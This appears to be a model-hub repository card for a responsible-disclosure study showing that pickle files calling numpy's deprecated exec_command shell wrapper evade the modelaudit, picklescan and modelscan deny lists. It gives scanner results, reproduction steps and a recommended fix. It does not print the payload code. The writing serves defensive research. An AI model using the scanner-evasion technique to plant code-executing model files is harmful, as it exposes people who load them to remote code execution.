You need to agree to share your contact information to access this model
This repository is publicly accessible, but you have to accept the conditions to access its files and content.
This repository contains a proof-of-concept exploit payload for security research purposes. Access to the pickle payload and PoC code requires acknowledgement of responsible use. By requesting access, you confirm you are a security researcher, penetration tester, or student using this material for defensive/educational purposes only.
Log in or Sign Up to review the conditions and access this model content.
numpy.distutils.exec_command β Payload-Layer Deny List Gap
Security Research β Responsible Disclosure This repository is part of a systematic study of pickle scanner bypass techniques. The payload demonstrates a detection gap in ML model security scanners. Access to
malicious_model.pklandpoc.pyrequires a request β see gate above.
Summary
Scanner scores for malicious_model.pkl:
| Scanner | CRITICAL | WARNING | Bypassed? |
|---|---|---|---|
| modelaudit 0.2.37 | 1 | 0 | Partial |
| picklescan 1.0.4 | 0 | 0 | Yes |
| modelscan | 0 | 0 | Yes |
Vulnerability
numpy.distutils.exec_command.exec_command(command) executes a shell command and returns (status, output). It was deprecated in NumPy 1.17 and is documented as a thin wrapper around subprocess.Popen. It remains importable in NumPy 2.x via the legacy distutils compatibility shim.
subprocess.Popen is in ALWAYS_DANGEROUS_FUNCTIONS. numpy.distutils wraps the same syscall path but is not. modelaudit's entry for numpy.distutils is in RISKY_ML_MODULE_PREFIXES β which fires a WARNING on bare import reference (S205) but does not automatically trigger CRITICAL on REDUCE.
Proof of Concept
malicious_model.pkl in this repository is the exploit payload.
poc.py builds and tests it with full scanner output.
How the PoC was built
# See poc.py
Affected file formats
Pickle (.pkl, .pt, .bin, .joblib) β any file deserialized via pickle.loads(),
torch.load(), joblib.load(), or equivalent.
Conditions required to trigger
- Target calls
pickle.loads(untrusted_bytes)or loads a model file via any pickle-based loader - The scanner performs static analysis only (no sandboxed execution)
- Scanner checks GLOBAL/STACK_GLOBAL opcodes against a deny list
Reproduction Steps
# 1. Request access above, then clone
git clone https://huggingface.co/SiggytheShark/pickle-bypass-numpy-distutils-exec
cd pickle-bypass-numpy-distutils-exec
# 2. Install requirements
pip install modelaudit picklescan modelscan
# 3. Scan β observe scanner scores match table above
modelaudit scan malicious_model.pkl
picklescan --path malicious_model.pkl
modelscan -p malicious_model.pkl
# 4. Execute to confirm RCE/side-effect
python3 poc.py
# 5. Verify
ls /tmp/scanner_bypass_proof.txt
Security Impact
Add "numpy.distutils.exec_command.exec_command" to ALWAYS_DANGEROUS_FUNCTIONS. Promote numpy.distutils from RISKY_ML_MODULE_PREFIXES to ALWAYS_DANGEROUS_MODULES β no sklearn or PyTorch checkpoint has a legitimate use for numpy's deprecated build toolchain internals.
Bypass mechanism: The payload evades static analysis while achieving its effect
(code execution, file write, or network connection) when pickle.loads() is called.
Real-world scenario: An attacker uploads this payload to a model hub. A victim
downloads and loads it. The scanner reports the file as safe (0 CRITICAL). The
payload fires silently β the return value of pickle.loads() looks like a normal
Python object while the side effect has already occurred.
Full Technical Writeup
numpy.distutils.exec_command β Payload-Layer Deny List Gap
Score:
- modelaudit static: WARNING only (S205 via
RISKY_ML_MODULE_PREFIXES) - modelaudit S201 REDUCE: CRITICAL (dynamic REDUCE pattern analysis)
- picklescan: 0 findings
- modelscan: 0 findings
Technique: Deprecated numpy distutils shell wrapper absent from all static deny lists
Scanner version: modelaudit 0.2.37, picklescan 1.0.4
Mechanism
numpy.distutils.exec_command.exec_command(command) executes a shell command and returns (status, output). It was deprecated in NumPy 1.17 and is documented as a thin wrapper around subprocess.Popen. It remains importable in NumPy 2.x via the legacy distutils compatibility shim.
subprocess.Popen is in ALWAYS_DANGEROUS_FUNCTIONS. numpy.distutils wraps the same syscall path but is not. modelaudit's entry for numpy.distutils is in RISKY_ML_MODULE_PREFIXES β which fires a WARNING on bare import reference (S205) but does not automatically trigger CRITICAL on REDUCE.
Scanner Comparison
| Scanner | Detection | Mechanism |
|---|---|---|
| modelaudit static | WARNING only | numpy.distutils in RISKY_ML_MODULE_PREFIXES β S205 |
| modelaudit S201 | CRITICAL | REDUCE pattern analysis fires when callable is actually REDUCEd |
| picklescan | 0 findings | Not in UNSAFE_GLOBALS |
| modelscan | 0 findings | Not in deny list |
This is the only entry that scores 0/0 from picklescan and modelscan regardless of the REDUCE.
Distinction: Payload-Layer vs Container-Layer
23_joblib_compression/is a container-layer bypass: picklescan can't read the file- This is a payload-layer bypass:
exec_commandis not in any static deny list
They compose: a compressed joblib file containing an exec_command payload evades picklescan twice over.
Recommended Fix
Add "numpy.distutils.exec_command.exec_command" to ALWAYS_DANGEROUS_FUNCTIONS. Promote numpy.distutils from RISKY_ML_MODULE_PREFIXES to ALWAYS_DANGEROUS_MODULES β no sklearn or PyTorch checkpoint has a legitimate use for numpy's deprecated build toolchain internals.
Requirements
pip install numpy # numpy.distutils must be available (NumPy < 2.0 or legacy shim)
General Analysis β Security Research